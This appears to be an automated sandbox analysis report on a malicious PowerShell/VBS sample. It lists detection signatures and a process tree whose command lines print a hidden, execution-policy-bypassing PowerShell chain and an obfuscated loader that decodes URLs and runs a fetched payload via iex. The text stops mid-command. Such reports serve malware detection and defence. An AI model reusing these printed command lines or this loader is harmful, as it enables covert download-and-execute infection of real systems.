General Information
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
- System is w10x64
- powershell.exe (PID: 7164 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\ni. ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3228 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4768 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -win hidde n =iex "[E nvironment ]::GetEnvi ronmentVar iable('pub lic') + '\ \z1rpb4.vb s'" MD5: 04029E121A0CFA5991749937DD22A1D9) - wscript.exe (PID: 5504 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \eji.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 2956 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "cls;write 'Undramat isables In grid130 Li njetegning s Crackaja ck Orloven Parches S yllid Idrt sparkerne Postoffice 169 Renlyd s landevej enes Perse cuted Post sigmoid Eh retia Koer sel Klippe huler Bobl epaknings Regalness Kldebons I rritative Assurances vigens Gen ecological ly149 Paru lis stryge rullerne U ndramatisa bles Ingri d130 Linje tegnings C rackajack Orloven Pa rches Syll id Idrtspa rkerne Pos toffice169 Renlyds l andevejene s Persecut ed Postsig moid Ehret ia Koersel Klippehul er Boblepa knings Reg alness Kld ebons Irri tative Ass urancesvig ens Geneco logically1 49 Parulis strygerul lerne';$Un dsatdeogly ph = 1;Fun ction Psyk opaterne($ Spleenens) {$Diastem= $Spleenens .Length-$U ndsatdeogl yph;$Noile r='SUBSTRI N';$Noiler +='G';For( $Undsat=5 ;$Undsat - lt $Diaste m;$Undsat+ =6){$Undra matisables +=$Spleene ns.$Noiler .Invoke( $ Undsat, $U ndsatdeogl yph);}$Und ramatisabl es;}functi on respons ibly($Intr aovarian12 9){ & ($F orgyldte) ($Intraova rian129);} $Skovtrern es=Psykopa terne 'non amMHaydooD ygtizCadea iApplal Ap pel Mokkar epor/ Inds 5Frak .Und e 0Talam W gsu(Happi WNonauiIrr esnvivifd, ssocoTrakt w,oressRab ar SphecN fashTNonr, Kansa1Bes ,t0Theop.M aint0Vap r ; Bunt a.g oWMaskei P a.rnL.nia6 S.ven4Syst e;Petal Vi soxAfg e6 Proc4Modst ;Sanit Arm ,nrOrdfovZ ,nag: ista 1Uvaer2Sto pf1Sixti.S krav0 Re.o )Photo Ga esGBagsteO vergc Cr.t kQuadroDog gi/thaum2 Vald0Amt,b 1Physi0 Is se0N.gle1P haet0Subco 1Stigr Swe eFSki.oiFi n,erm dule K aphfGene roClangx f rem/Prale1 Unsea2,ncu l1 Caus.P. dio0S.asi ';$Hir=Psy kopaterne 'PipesUnon resTmrereP ernarUn ha -r,ferABip lag O hee RingnSixty tevent ';$ Orloven=Ps ykopaterne 'DatabhUn coutNoncot fornupC,mp as Prad:Ko dni/ .ypo/ UnspiwAfmg twArtifwPe rfe. Holge Confer,wir pph gga-Tw i.erSkulao StiftySpir ,aProfilTv rli-Uni,pc Tid.arPi g ioReptiw P uttnAn id. DediiChad ondeflofIn desoAcras/ PrdiwLens hhHotbr/Ca tapSStempa nagorGule roVaabetCh esthBygger Lan,bu Vi, kmtrich.Ad va,jLon.op vermibCamp h> He.uhGa rant Forbt BlamapItal isGypso: M ust/Di ci/ Methw Und ewforurw,i pse.Prom a Par.plSlmn imMobedr C onswVejgra ,rogrd Tog f.Barsecpa ra oStjdem Citat/Anyw hw CholhSk aks/StyreS SwotaShei krRutebo S ub.tVestsh S,regr,emi cuSepalmGe la.. Stikj NiddepSili cbLgnag '; $Syndsbeke ndelsens=P sykopatern e ' Insk>S trou ';$Fo rgyldte=Ps ykopaterne 'ShoppiMe asueEtta,x poo.a ';$g rydeskeers ='Idrtspar kerne';$Ad voker = Ps ykopaterne 'EftereGr ,ndc Strih Sa,lioDeta . Stad%Rec idaGainspU lyksp Ud r d ilmna,gl ertForhaa M,no%Renai \.igenA.on athLandfoH ash rSuppo nTrykitHai lerL,cie.S lid.P Av.s iTr,kabUne xo Bildk&S